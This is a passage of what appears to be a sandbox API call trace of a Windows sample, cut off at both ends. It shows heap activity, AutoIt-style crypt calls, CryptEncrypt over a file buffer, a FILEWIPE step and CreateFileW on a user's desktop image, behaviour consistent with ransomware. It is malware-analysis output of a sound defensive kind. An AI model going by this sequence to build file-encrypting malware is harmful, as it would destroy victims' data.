dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.164] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.164] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.165] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x44c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x44d0) returned 1 [0075.165] CharLowerBuffW (in: lpsz="byte[17617]", cchLength=0xb | out: lpsz="byte[17617]") returned 0xb [0075.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.166] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x79a4c8*, pdwDataLen=0x61e2d8*=0x44c1, dwBufLen=0x44d0 | out: pbData=0x79a4c8*, pdwDataLen=0x61e2d8*=0x44d0) returned 1 [0075.166] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.166] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.166] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.169] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.169] CryptDestroyKey (hKey=0x6b8ab8) returned 1 [0075.169] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.169] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.170] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.170] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.172] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.172] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0x2454b2e0, ftLastWriteTime.dwHighDateTime=0x1d5e10e, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x0, dwReserved1=0x657690, cFileName="bqTv.png", cAlternateFileName="")) returned 0x6b8b38 [0075.173] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.173] CharLowerBuffW (in: lpsz="byte[17601]", cchLength=0xb | out: lpsz="byte[17601]") returned 0xb [0075.173] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.173] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.173] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.173] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.173] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.173] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb428 [0075.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb428, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.173] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.174] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.174] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.174] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.174] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e660 [0075.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698698 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.177] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.178] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4ff0 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a4ff0 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.178] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: 